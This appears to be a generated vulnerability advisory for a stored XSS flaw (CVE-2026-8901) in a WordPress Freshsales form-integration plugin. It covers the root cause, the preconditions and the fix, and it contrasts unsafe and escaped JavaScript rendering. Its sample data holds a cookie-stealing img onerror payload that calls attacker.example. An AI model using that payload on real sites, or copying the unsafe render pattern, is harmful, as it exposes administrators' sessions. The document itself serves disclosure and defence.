CVE-2026-8901
Description
The Integration for Freshsales – Contact Form 7, WPForms, Elementor, Gravity Forms and More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission data in all versions up to, and including, 1.0.15, due to insufficient input sanitization and output escaping. An unauthenticated attacker can submit a form containing arbitrary web script. The payload is stored only when the CRM API call for that submission fails, and it executes only when an administrator opens the error log details modal in the WordPress admin panel.
Affected products
- WordPress/Integration for Freshsales – Contact Form 7, WPForms, Elementor, Gravity Forms and More (no CPE assigned): range <=1.0.15
Patches
No patches discovered yet. Note that the affected range above includes 1.0.15 while the "What the fix does" section below compares the 1.0.14 and 1.0.15 sources; confirm the fixed version against the plugin changelog before treating 1.0.15 as safe.
Vulnerability mechanics
Root cause
"The plugin fails to properly sanitize user-supplied data before storing it in the error log, allowing for the injection of arbitrary web scripts."
Attack vector
An unauthenticated attacker submits form data containing JavaScript. When the CRM API call for that submission fails, the plugin writes the raw form data to its error log. The script then executes when an administrator views the error log details modal in the WordPress admin panel. The root cause is insufficient input sanitization and output escaping in the form submission and error-logging path [ref_id=1].
Affected code
The vulnerability resides in the `add_error_log` function in `src/db/fw-error-log.php`, which inserts error details, including the submitted form data, into the `integrazo_fwcrm_form_error_log` database table. The referenced sources for versions 1.0.14 and 1.0.15 show the section where form data is processed before the insert [ref_id=1, ref_id=2].
What the fix does
The patch applies input sanitization and output escaping to the form data stored in the error log. Specifically, `add_error_log` in `fw-error-log.php` now encodes potentially harmful characters in `$form_data` before it is serialized to a JSON string and stored, so the value is rendered as literal text rather than interpreted as markup when an administrator views it. Because the encoding happens at write time, rows written before the update still hold the raw payload; clearing or re-encoding the existing error log is part of remediation.
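The following is an added example, not code from the plugin or from the referenced advisory. It models, in plain JavaScript, how a stored error-log row whose `form_data` column holds raw submitted fields reaches an admin-side details modal, contrasting a render path that concatenates the stored values straight into markup with one that escapes them first. The row shape, field names and function names are assumptions made for illustration; the page describes the real fix as encoding in the PHP `add_error_log` function, and this example shows the complementary output-side control.

```javascript
// Added example (not the plugin's code). Demonstrates why unescaped form
// submission data stored in an error-log row becomes stored XSS when an
// admin modal renders it, and how escaping at the output sink neutralises it.
// Row shape and field names are hypothetical.

// Constructed sample row: form fields stored as a JSON string, as the page
// describes for the error-log table. The "message" value is the kind of
// payload any anonymous visitor could type into a free-text form field.
const sampleRow = {
  id: 42,
  form_name: "Contact Form 7 - contact",
  error_message: "CRM API call failed: HTTP 401",
  form_data: JSON.stringify({
    name: "Alice",
    message:
      '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  }),
};

// Minimal HTML entity escaper, sufficient for text placed in an element body
// or inside a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: stored values are interpolated into markup that would
// later be assigned to innerHTML. Whatever the submitter typed becomes DOM,
// and the onerror handler runs in the administrator's session.
function renderDetailsUnsafe(row) {
  const fields = JSON.parse(row.form_data);
  let html = `<p>${row.error_message}</p><table>`;
  for (const [key, value] of Object.entries(fields)) {
    html += `<tr><td>${key}</td><td>${value}</td></tr>`;
  }
  return html + "</table>";
}

// Hardened pattern: every untrusted string is escaped before it touches the
// markup, so the payload is displayed as literal text in the modal.
function renderDetailsSafe(row) {
  const fields = JSON.parse(row.form_data);
  let html = `<p>${escapeHtml(row.error_message)}</p><table>`;
  for (const [key, value] of Object.entries(fields)) {
    html += `<tr><td>${escapeHtml(key)}</td><td>${escapeHtml(value)}</td></tr>`;
  }
  return html + "</table>";
}

// Stand-in for "would the browser create this element from submitter text":
// does the rendered markup contain an unescaped opening tag of that name?
function containsLiveTag(html, tagName) {
  return new RegExp(`<${tagName}\\b`, "i").test(html);
}
```

Pick one layer and apply it consistently: if the stored value is already entity-encoded at write time, as the page says the fix does, escaping it again at render double-encodes and shows `&amp;lt;` to the administrator; if only the render path escapes, every consumer of the table (CSV export, e-mail digest, REST endpoint) must do the same. In a real modal, assigning values via `textContent` on individual cells avoids building HTML strings at all.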
Preconditions
- auth: The attacker does not need to be authenticated.
- input: The attacker must submit form data containing a JavaScript payload.
- config: The CRM API call for the submitted form must fail.
- auth: An administrator must view the error log details modal.
Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/assets/js/error-log.js (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/db/fw-error-log.php (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/forms/submit-action.php (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/product/fw-errorlog-action.php (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/assets/js/error-log.js (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/db/fw-error-log.php (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/forms/submit-action.php (nvd)
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/product/fw-errorlog-action.php (nvd)
- plugins.trac.wordpress.org/changeset (nvd)
- www.wordfence.com/threat-intel/vulnerabilities/id/a4c8cf71-e9b0-4241-b975-f52aeb823318 (nvd)
News mentions
No linked articles in our index yet.